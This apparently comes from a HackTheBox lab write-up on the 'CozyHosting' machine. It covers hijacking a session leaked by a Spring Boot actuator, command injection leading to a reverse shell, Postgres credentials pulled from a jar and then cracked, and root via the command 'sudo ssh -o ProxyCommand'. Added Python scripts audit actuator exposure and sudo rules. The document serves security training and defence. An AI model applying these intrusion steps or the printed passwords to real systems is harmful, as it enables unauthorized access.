#hackthebox #easy #linux

![[Pasted image 20250802153644.png]]

# Information Gathering

A TCP scan against all ports discovered 2 open ports: 22 and 80.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:06 UTC
Nmap scan report for 10.10.11.230
Host is up (0.051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 17.33 seconds
```

One more TCP scan with the `-sCV` flags against the two open ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:08 UTC
Nmap scan report for 10.10.11.230
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.39 seconds
```

Lastly, a UDP scan of the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:09 UTC
Nmap scan report for 10.10.11.230
Host is up (0.047s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   open|filtered dhcps
123/udp  closed        ntp
135/udp  closed        msrpc
137/udp  closed        netbios-ns
138/udp  closed        netbios-dgm
161/udp  closed        snmp
445/udp  closed        microsoft-ds
631/udp  closed        ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
```

---

# Enumeration

##### HTTP - TCP 80

The Nmap output mentions the hostname `cozyhosting.htb` (the HTTP title reports a redirect to it).
Let's add it to `/etc/hosts` so the domain resolves to the target IP.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.11.230 cozyhosting.htb" | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.11.230 cozyhosting.htb
```

The website on port 80 appears to be a hosting service for businesses.

![[Pasted image 20250802131256.png]]

`View Page Source` and the `footer` tell us the page was built with a `BootstrapMade` template.

![[Pasted image 20250802131518.png]]

![[Pasted image 20250802131538.png]]

I looked it up on `searchsploit`, but there are no known vulnerabilities for it.

Requesting a non-existent page landed me on a `Whitelabel Error Page`.

![[Pasted image 20250802133803.png]]

Google tells me this is the default error page of `Spring Boot` applications.

![[Pasted image 20250802133903.png]]

My initial `gobuster` run with the `directory-list-2.3-medium.txt` wordlist didn't reveal much. Since we now know the application was built with `Spring Boot`, let's run `gobuster` again with a more appropriate wordlist.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://cozyhosting.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cozyhosting.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 12706]
/login                (Status: 200) [Size: 4431]
/admin                (Status: 401) [Size: 97]
/logout               (Status: 204) [Size: 0]
/error                (Status: 500) [Size: 73]
/http%3A%2F%2Fwww     (Status: 400) [Size: 435]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 435]
```

There's a `Java-Spring-Boot.txt` wordlist under `seclists`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ find /usr/share/seclists/ | grep -i spring
/usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt
```

This time we hit several 200 responses.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://cozyhosting.htb -w /usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cozyhosting.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/actuator             (Status: 200) [Size: 634]
/actuator/env/lang    (Status: 200) [Size: 487]
/actuator/env/path    (Status: 200) [Size: 487]
/actuator/env/home    (Status: 200) [Size: 487]
/actuator/env         (Status: 200) [Size: 4957]
/actuator/health      (Status: 200) [Size: 15]
/actuator/mappings    (Status: 200) [Size: 9938]
/actuator/beans       (Status: 200) [Size: 127224]
/actuator/sessions    (Status: 200) [Size: 48]
Progress: 120 / 121 (99.17%)
===============================================================
Finished
===============================================================
```

I found `kanderson` under `/actuator/sessions`. The value listed next to it is likely the session ID of the user `kanderson`.

![[Pasted image 20250802135636.png]]

I opened my browser's `Inspect` tool and replaced my current session cookie with kanderson's.

![[Pasted image 20250802135917.png]]

When I refreshed the page, the `login` button was gone.

![[Pasted image 20250802140018.png]]

I navigated to `/admin` and was successfully logged in as `K. Anderson`.
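The whole foothold rests on a configuration choice: the actuator `sessions` endpoint (and `env`, `beans`, `mappings`) is exposed over HTTP, and the `application.properties` recovered later in the writeup confirms it with `management.endpoints.web.exposure.include=health,beans,env,sessions,mappings`. Below is an added example, not code from the writeup or from the CozyHosting application, that audits a Spring Boot `application.properties` for exactly that pattern and shows the hardened property set beside it. The property keys are real Spring Boot keys; both sample files are constructed (`WEAK` mirrors the page's file with the real password replaced by a placeholder), and the set of "sensitive" endpoints is a constructed subset.

```python
"""
Audit a Spring Boot application.properties for the exposure pattern this box
turns on: actuator endpoints that leak internals reachable over HTTP, the
sessions endpoint switched on, and the datasource password kept in plaintext.
Added example, not code from the writeup or the CozyHosting application.
"""
import re

# Constructed subset of actuator endpoints whose output an attacker can reuse:
# sessions lists live session IDs (the hijack on this box), env dumps
# configuration and can include credentials, mappings and beans describe the
# application's internals. health is the one endpoint usually safe to expose.
SENSITIVE_ENDPOINTS = {"beans", "env", "mappings", "sessions",
                       "heapdump", "threaddump", "configprops", "loggers", "shutdown"}

# Constructed sample mirroring the page's file; password value is a placeholder.
WEAK = """\
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=PLAINTEXT-PASSWORD-PLACEHOLDER
"""

# Hardened counterpart (constructed): only health is exposed, sessions is off,
# the actuator lives on its own loopback-bound port, and the password is
# injected from the environment instead of being baked into the jar.
HARDENED = """\
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health
management.endpoint.sessions.enabled=false
management.server.port=8081
management.server.address=127.0.0.1
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=${DB_PASSWORD}
"""

_LINE = re.compile(r"^([^=:\s]+)\s*[=:]\s*(.*)$")


def parse_properties(text):
    """Parse Java .properties text into a dict. Comments and blank lines are
    skipped and whitespace around the separator is tolerated, so
    'management.endpoint.sessions.enabled = true' parses like the page's file."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = _LINE.match(line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def audit(props):
    """Return a list of human-readable findings; an empty list means clean."""
    findings = []
    include = props.get("management.endpoints.web.exposure.include", "")
    exposed = {e.strip() for e in include.split(",") if e.strip()}
    if "*" in exposed:
        findings.append("every actuator endpoint is exposed over HTTP (include=*)")
    else:
        leaky = sorted(exposed & SENSITIVE_ENDPOINTS)
        if leaky:
            findings.append("sensitive actuator endpoints exposed: " + ", ".join(leaky))
    if props.get("management.endpoint.sessions.enabled", "").lower() == "true":
        findings.append("sessions endpoint enabled: it lists live session IDs")
    password = props.get("spring.datasource.password", "")
    if password and not password.startswith("${"):
        findings.append("datasource password stored in plaintext; inject it via ${ENV_VAR} or a secret store")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"[{name}]")
        for finding in audit(parse_properties(text)) or ["no findings"]:
            print("  -", finding)
```

Run it and the `WEAK` sample produces three findings while `HARDENED` produces none. Since the application binds to `127.0.0.1` and is only reachable through nginx, a second layer is to deny `/actuator` at the reverse proxy as well, so a future config regression does not immediately become an internet-facing session leak.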
![[Pasted image 20250802140043.png]]

# Initial Access - Shell as `app`

Scrolling down a bit, I found a `connection setting` form.

![[Pasted image 20250802140724.png]]

I intercepted the request, sent it to Burp and tweaked the parameters for a while, and noticed that it's vulnerable to command execution.

![[Pasted image 20250802143336.png]]

At first I tried to obtain a reverse shell right away, but after a lot of failed attempts I decided to first write a reverse shell script to the target host and then execute it to get the shell.

![[Pasted image 20250802145207.png]]

The code in the screenshot above finally worked: it connected to my Python web server and grabbed the payload.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.230 - - [02/Aug/2025 19:51:42] "GET /payload HTTP/1.1" 200 -
```

Then I executed the payload on the server.

![[Pasted image 20250802145359.png]]

Finally, a reverse shell as `app`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.230] 36720
bash: cannot set terminal process group (1064): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ whoami
whoami
app
app@cozyhosting:/app$
```

# Lateral Movement - Shell as `josh`

In `/app` there was a `cloudhosting-0.0.1.jar` file. I copied it to `/dev/shm` to unzip it.

```bash
app@cozyhosting:/app$ ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$ cp cloudhosting-0.0.1.jar /dev/shm/
```

I unzipped the file and recursively searched for the string `password`. I got a few hits, but the one that stood out was the `application.properties` file.

```bash
app@cozyhosting:/dev/shm$ grep -Horni password . 2>/dev/null
./BOOT-INF/classes/application.properties:12:password
./BOOT-INF/classes/templates/login.html:57:Password
./BOOT-INF/classes/templates/login.html:57:Password
./BOOT-INF/classes/templates/login.html:58:password
./BOOT-INF/classes/templates/login.html:58:password
./BOOT-INF/classes/templates/login.html:58:Password
./BOOT-INF/classes/templates/login.html:60:password
./BOOT-INF/classes/templates/login.html:73:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:6155:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:6160:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:3710:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:3713:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:1277:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:1278:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:1276:password
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:1277:password
```

I pulled up the file and it contained `postgres` credentials.
```bash
app@cozyhosting:/dev/shm$ cat BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
app@cozyhosting:/dev/shm$
```

I logged into the Postgres database using `psql`.

```bash
app@cozyhosting:/dev/shm$ psql -h localhost -U postgres
Password for user postgres: 
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#
```

`\list` lists all the existing databases.

![[Pasted image 20250802151844.png]]

`\c cozyhosting` selects `cozyhosting` as the current database, and `\d` lists all the tables in it.

![[Pasted image 20250802151924.png]]

`select * from users;`

![[Pasted image 20250802152203.png]]

`hashcat` cracked the `admin` hash, which turned out to be `manchesterunited` in plaintext.

```bash
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
```

With that password, `su josh` worked.

```bash
app@cozyhosting:/dev/shm$ su josh
Password: 
josh@cozyhosting:/dev/shm$ whoami
josh
josh@cozyhosting:/dev/shm$
```

# Privilege Escalation - Shell as `root`

Found `user.txt`.

```bash
josh@cozyhosting:~$ ls
user.txt
josh@cozyhosting:~$ cat user.txt
261...
```

`sudo -l` revealed that `josh` can run `/usr/bin/ssh` with any arguments as `root`.
```bash
josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
```

`GTFOBins` taught me the following command: `ssh` runs its `ProxyCommand` through a shell, and it does not drop the elevated privileges.

```bash
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
[sudo] password for josh: 
# whoami
root
```

Found `root.txt`.

```bash
# cd /root
# ls
root.txt
# cat root.txt
d38f...
```
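The root step works because the rule `(root) /usr/bin/ssh *` combines a wildcard with a binary that can hand its caller a shell, so the fix is to remove the wildcard (or wrap the one intended invocation in a fixed script) rather than to block a single option. Below is an added example, not code from the writeup, that parses the rule section of `sudo -l` output and flags the three properties worth catching in a review: wildcard arguments, binaries that GTFOBins documents as shell-capable, and `NOPASSWD`. `SHELL_CAPABLE` is a constructed subset of that list, and the sample outputs are constructed (the first one reproduces the page's rule with a second rule added for contrast).

```python
"""
Audit the rule section of `sudo -l` output for grants that amount to a root
shell, such as the `(root) /usr/bin/ssh *` rule on this box.
Added example, not code from the writeup.
"""
import re

# Constructed subset of binaries GTFOBins documents as able to spawn a shell
# or run arbitrary commands when executed via sudo. Extend it from that site.
SHELL_CAPABLE = {"ssh", "bash", "sh", "dash", "python3", "perl",
                 "vim", "vi", "less", "find", "env"}

# "(runas) [TAG: ...] command args", the shape sudo -l prints each rule in.
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Page's rule plus a constructed second rule for contrast.
SAMPLE = """\
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
    (root) NOPASSWD: /usr/bin/cat /var/log/nginx/access.log
"""

# Constructed: fixed binary, fixed arguments, password still required.
SAFE = """\
User ops may run the following commands on localhost:
    (root) /usr/bin/cat /var/log/nginx/access.log
"""


def parse_sudo_l(text):
    """Return [(runas, tags, command_line)] for each rule listed under the
    'may run the following commands' header; Defaults lines are ignored."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = _RULE.match(line)
        if m:
            tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def audit_rules(rules):
    """One finding per problem; an empty list means every rule is tightly scoped."""
    findings = []
    for runas, tags, cmd in rules:
        if cmd == "ALL":
            findings.append(f"{cmd}: unrestricted sudo as {runas}")
            continue
        argv = cmd.split()
        binary = argv[0].rsplit("/", 1)[-1]
        # A wildcard in the argument list lets the caller pick any option,
        # which is what turns a harmless-looking ssh grant into a root shell.
        if any("*" in a for a in argv[1:]):
            findings.append(f"{cmd}: wildcard lets the caller choose {binary}'s options")
        if binary in SHELL_CAPABLE:
            findings.append(f"{cmd}: {binary} can spawn a shell as {runas} (see GTFOBins)")
        if "NOPASSWD" in tags:
            findings.append(f"{cmd}: NOPASSWD removes the password prompt")
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SAMPLE)):
        print("-", finding)
```

Against `SAMPLE` the script reports the wildcard and the shell-capable binary for the `ssh` rule and the missing password check for the second rule; `SAFE` produces nothing because the binary and every argument are fixed. The same parser can be pointed at `sudo -l -U <user>` output collected across a fleet to find rules of this shape before someone else does.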